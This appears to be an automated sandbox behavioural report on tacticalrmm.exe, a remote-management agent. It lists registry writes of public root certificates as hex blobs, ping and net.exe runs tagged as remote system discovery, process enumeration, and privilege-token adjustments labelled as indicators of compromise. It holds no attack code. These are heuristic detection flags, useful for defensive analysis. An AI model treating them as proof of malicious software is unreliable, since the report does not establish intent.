Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1368000000010000000800000000409120d035d9017e000000010000000800000000c001b39667d6017f000000010000000e000000300c060a2b0601040182370a03041d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589100b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000006200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd6770739090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 5c00000001000000040000000008000019000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877604000000010000001000000091de0625abdafd32170cbb25172a846720000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	tacticalrmm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d60168000000010000000800000000409120d035d901030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 5c0000000100000004000000000800001900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1368000000010000000800000000409120d035d9017e000000010000000800000000c001b39667d6017f000000010000000e000000300c060a2b0601040182370a03041d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589100b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000006200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd6770739090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d040000000100000010000000410352dc0ff7501b16f0028eba6f45c520000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	tacticalrmm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 04000000010000001000000091de0625abdafd32170cbb25172a84670f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee419000000010000001000000063664b080559a094d10f0a3c5f4f629020000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	tacticalrmm.exe

Runs net.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
1724	PING.EXE
3368	PING.EXE

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
4496	tacticalrmm.exe
4940	tacticalrmm.exe
4388	powershell.exe
4388	powershell.exe
4940	tacticalrmm.exe
4940	tacticalrmm.exe
2172	tacticalrmm.exe
2172	tacticalrmm.exe
2172	tacticalrmm.exe
1356	powershell.exe
1356	powershell.exe
2172	tacticalrmm.exe
2172	tacticalrmm.exe
3160	tacticalrmm.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2396	taskkill.exe
Token: SeDebugPrivilege	4496	tacticalrmm.exe
Token: SeDebugPrivilege	4940	tacticalrmm.exe
Token: SeAssignPrimaryTokenPrivilege	1464	wmic.exe
Token: SeIncreaseQuotaPrivilege	1464	wmic.exe
Token: SeSecurityPrivilege	1464	wmic.exe
Token: SeTakeOwnershipPrivilege	1464	wmic.exe
Token: SeLoadDriverPrivilege	1464	wmic.exe
Token: SeSystemtimePrivilege	1464	wmic.exe
Token: SeBackupPrivilege	1464	wmic.exe
Token: SeRestorePrivilege	1464	wmic.exe
Token: SeShutdownPrivilege	1464	wmic.exe
Token: SeSystemEnvironmentPrivilege	1464	wmic.exe
Token: SeUndockPrivilege	1464	wmic.exe
Token: SeManageVolumePrivilege	1464	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	1464	wmic.exe
Token: SeIncreaseQuotaPrivilege	1464	wmic.exe
Token: SeSecurityPrivilege	1464	wmic.exe
Token: SeTakeOwnershipPrivilege	1464	wmic.exe
Token: SeLoadDriverPrivilege	1464	wmic.exe
Token: SeSystemtimePrivilege	1464	wmic.exe
Token: SeBackupPrivilege	1464	wmic.exe
Token: SeRestorePrivilege	1464	wmic.exe
Token: SeShutdownPrivilege	1464	wmic.exe
Token: SeSystemEnvironmentPrivilege	1464	wmic.exe
Token: SeUndockPrivilege	1464	wmic.exe
Token: SeManageVolumePrivilege	1464	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	4092	wmic.exe
Token: SeIncreaseQuotaPrivilege	4092	wmic.exe
Token: SeSecurityPrivilege	4092	wmic.exe
Token: SeTakeOwnershipPrivilege	4092	wmic.exe
Token: SeLoadDriverPrivilege	4092	wmic.exe
Token: SeSystemtimePrivilege	4092	wmic.exe
Token: SeBackupPrivilege	4092	wmic.exe
Token: SeRestorePrivilege	4092	wmic.exe
Token: SeShutdownPrivilege	4092	wmic.exe
Token: SeSystemEnvironmentPrivilege	4092	wmic.exe
Token: SeUndockPrivilege	4092	wmic.exe
Token: SeManageVolumePrivilege	4092	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	4092	wmic.exe
Token: SeIncreaseQuotaPrivilege	4092	wmic.exe
Token: SeSecurityPrivilege	4092	wmic.exe
Token: SeTakeOwnershipPrivilege	4092	wmic.exe
Token: SeLoadDriverPrivilege	4092	wmic.exe
Token: SeSystemtimePrivilege	4092	wmic.exe
Token: SeBackupPrivilege	4092	wmic.exe
Token: SeRestorePrivilege	4092	wmic.exe
Token: SeShutdownPrivilege	4092	wmic.exe
Token: SeSystemEnvironmentPrivilege	4092	wmic.exe
Token: SeUndockPrivilege	4092	wmic.exe
Token: SeManageVolumePrivilege	4092	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	4480	wmic.exe
Token: SeIncreaseQuotaPrivilege	4480	wmic.exe
Token: SeSecurityPrivilege	4480	wmic.exe
Token: SeTakeOwnershipPrivilege	4480	wmic.exe
Token: SeLoadDriverPrivilege	4480	wmic.exe
Token: SeSystemtimePrivilege	4480	wmic.exe
Token: SeBackupPrivilege	4480	wmic.exe
Token: SeRestorePrivilege	4480	wmic.exe
Token: SeShutdownPrivilege	4480	wmic.exe
Token: SeSystemEnvironmentPrivilege	4480	wmic.exe
Token: SeUndockPrivilege	4480	wmic.exe
Token: SeManageVolumePrivilege	4480	wmic.exe
